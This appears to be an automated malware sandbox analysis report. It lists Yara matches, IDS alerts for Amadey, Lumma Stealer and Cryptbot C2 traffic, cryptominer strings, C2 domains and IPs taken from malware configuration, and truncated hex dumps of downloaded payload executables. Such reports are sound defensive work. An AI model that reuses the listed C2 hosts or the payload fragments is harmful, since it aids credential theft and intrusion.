                            Source: Yara matchFile source: 00000032.00000002.3123702464.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2785095073.00000261B8C20000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000032.00000002.3209877428.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000020.00000002.2790543601.0000000000737000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000031.00000003.3117966316.000001AE2B720000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 5144, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2548, type: MEMORYSTR
                            Source: Intel_PTT_EK_Recertification.exe, 0000001F.00000003.2785095073.00000261B8C20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                            Source: Intel_PTT_EK_Recertification.exe, 0000001F.00000003.2785095073.00000261B8C20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
                            Source: Intel_PTT_EK_Recertification.exe, 0000001F.00000003.2785095073.00000261B8C20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                            Source: Intel_PTT_EK_Recertification.exe, 0000001F.00000003.2785095073.00000261B8C20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                            Source: random.exe_Y.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.6:49880 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.6:49930 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.6:49941 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.6:49955 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.6:49967 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.6:49978 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.6:49990 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.6:50000 version: TLS 1.2
                            Source: Binary string: wkernel32.pdb source: d7691cd336.exe, 00000024.00000003.2816311933.0000000005010000.00000004.00000001.00020000.00000000.sdmp, d7691cd336.exe, 00000024.00000003.2816191729.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2821430291.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2821309340.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
                            Source: Binary string: wkernelbase.pdb source: d7691cd336.exe, 00000024.00000003.2816649342.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp, d7691cd336.exe, 00000024.00000003.2816838324.0000000005110000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2822637005.0000000005300000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2821727826.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
                            Source: Binary string: ntdll.pdb source: d7691cd336.exe, 00000024.00000003.2814530012.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp, d7691cd336.exe, 00000024.00000003.2814843608.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2819961783.00000000052D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2819182827.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
                            Source: Binary string: wntdll.pdbUGP source: d7691cd336.exe, 00000024.00000003.2815576997.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp, d7691cd336.exe, 00000024.00000003.2815815140.0000000005090000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2820660089.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
                            Source: Binary string: ntdll.pdbUGP source: d7691cd336.exe, 00000024.00000003.2814530012.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp, d7691cd336.exe, 00000024.00000003.2814843608.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2819961783.00000000052D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2819182827.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
                            Source: Binary string: wntdll.pdb source: d7691cd336.exe, 00000024.00000003.2815576997.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp, d7691cd336.exe, 00000024.00000003.2815815140.0000000005090000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2820660089.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
                            Source: Binary string: wkernelbase.pdbUGP source: d7691cd336.exe, 00000024.00000003.2816649342.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp, d7691cd336.exe, 00000024.00000003.2816838324.0000000005110000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2822637005.0000000005300000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2821727826.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
                            Source: Binary string: wkernel32.pdbUGP source: d7691cd336.exe, 00000024.00000003.2816311933.0000000005010000.00000004.00000001.00020000.00000000.sdmp, d7691cd336.exe, 00000024.00000003.2816191729.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2821430291.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2821309340.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,8_2_0040367D
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,8_2_004031DC
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00797978 FindFirstFileW,FindFirstFileW,free,12_2_00797978
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_0079881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,12_2_0079881C
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior

                            Networking

                            barindex
                            Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49789 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49796
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49833 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.6:64882 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49873 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.6:62446 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:49880 -> 104.21.64.80:443
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49855 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:49886 -> 104.21.64.80:443
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49906 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49925 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:49999 -> 185.185.71.170:80
                            Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:50010 -> 185.185.71.170:80
                            Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:50031 -> 185.185.71.170:80
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49880 -> 104.21.64.80:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49880 -> 104.21.64.80:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49930 -> 172.67.209.202:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49930 -> 172.67.209.202:443
                            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49941 -> 172.67.209.202:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49941 -> 172.67.209.202:443
                            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50000 -> 172.67.209.202:443
                            Source: Malware configuration extractorURLs: rapeflowwj.lat
                            Source: Malware configuration extractorURLs: pancakedipyps.click
                            Source: Malware configuration extractorURLs: grannyejh.lat
                            Source: Malware configuration extractorURLs: sustainskelet.lat
                            Source: Malware configuration extractorURLs: crosshuaht.lat
                            Source: Malware configuration extractorURLs: necklacebudi.lat
                            Source: Malware configuration extractorURLs: discokeyus.lat
                            Source: Malware configuration extractorURLs: aspecteirs.lat
                            Source: Malware configuration extractorURLs: energyaffai.lat
                            Source: Malware configuration extractorIPs: 185.215.113.43
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 18 Dec 2024 10:47:13 GMTContent-Type: application/octet-streamContent-Length: 4438776Last-Modified: Tue, 10 Dec 2024 00:01:52 GMTConnection: keep-aliveETag: "675784f0-43baf8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 4f 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 18 Dec 2024 10:47:26 GMTContent-Type: application/octet-streamContent-Length: 1960448Last-Modified: Wed, 18 Dec 2024 10:37:12 GMTConnection: keep-aliveETag: "6762a5d8-1dea00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cd d8 9a 7a 89 b9 f4 29 89 b9 f4 29 89 b9 f4 29 c2 c1 f7 28 82 b9 f4 29 c2 c1 f1 28 06 b9 f4 29 c2 c1 f0 28 9d b9 f4 29 9c c6 f1 28 af b9 f4 29 9c c6 f0 28 98 b9 f4 29 9c c6 f7 28 9d b9 f4 29 c2 c1 f5 28 8a b9 f4 29 89 b9 f5 29 da b9 f4 29 89 b9 f4 29 8b b9 f4 29 b3 39 f0 28 8a b9 f4 29 b3 39 0b 29 88 b9 f4 29 b3 39 f6 28 88 b9 f4 29 52 69 63 68 89 b9 f4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 7c 03 00 00 5e 03 00 00 00 01 00 00 d0 4a 00 00 10 00 00 00 90 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4b 00 00 04 00 00 7c 02 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 e0 07 00 6a 00 00 00 00 c0 07 00 6c 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 e1 07 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 07 00 00 10 00 00 00 3c 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 6c 16 00 00 00 c0 07 00 00 08 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 07 00 00 02 00 00 00 54 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 29 00 00 f0 07 00 00 02 00 00 00 56 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 63 69 7a 61 7a 75 6a 00 70 19 00 00 50 31 00 00 6c 19 00 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6d 6c 66 78 6f 67 77 00 10 00 00 00 c0 4a 00 00 04 00 00 00 c4 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4a 00 00 22 00 00 00 c8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 18 Dec 2024 10:47:35 GMTContent-Type: application/octet-streamContent-Length: 765568Last-Modified: Tue, 17 Dec 2024 09:46:16 GMTConnection: keep-aliveETag: "67614868-bae80"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 0b 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 02 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c a8 01 00 00 10 00 00 00 aa 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 8b 00 00 00 c0 01 00 00 8c 00 00 00 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 22 00 00 00 50 02 00 00 16 00 00 00 3e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 53 00 00 00 00 53 00 00 00 00 80 02 00 00 02 00 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 02 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 00 00 00 00 a0 02 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 19 00 00 00 b0 02 00 00 1a 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 86 04 00 00 d0 02 00 00 86 04 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 86 04 00 00 60 07 00 00 86 04 00 00 fa 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 18 Dec 2024 10:47:42 GMTContent-Type: application/octet-streamContent-Length: 4466688Last-Modified: Wed, 18 Dec 2024 10:17:55 GMTConnection: keep-aliveETag: "6762a153-442800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e0 55 60 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 3e 44 00 00 2e 64 00 00 32 00 00 00 30 b6 00 00 10 00 00 00 50 44 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 60 b6 00 00 04 00 00 e5 ce 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 90 61 00 73 00 00 00 00 80 61 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 1b b6 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 1a b6 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 61 00 00 10 00 00 00 3e 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 80 61 00 00 02 00 00 00 4e 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 61 00 00 02 00 00 00 50 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 38 00 00 a0 61 00 00 02 00 00 00 52 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 68 76 66 65 76 70 69 00 b0 1b 00 00 70 9a 00 00 ae 1b 00 00 54 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 67 73 6e 68 74 69 65 00 10 00 00 00 20 b6 00 00 04 00 00 00 02 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 b6 00 00 22 00 00 00 06 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 18 Dec 2024 10:47:54 GMTContent-Type: application/octet-streamContent-Length: 776832Last-Modified: Tue, 17 Dec 2024 09:45:14 GMTConnection: keep-aliveETag: "6761482a-bda80"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 0c 00 00 08 00 00 00 00 00 00 03 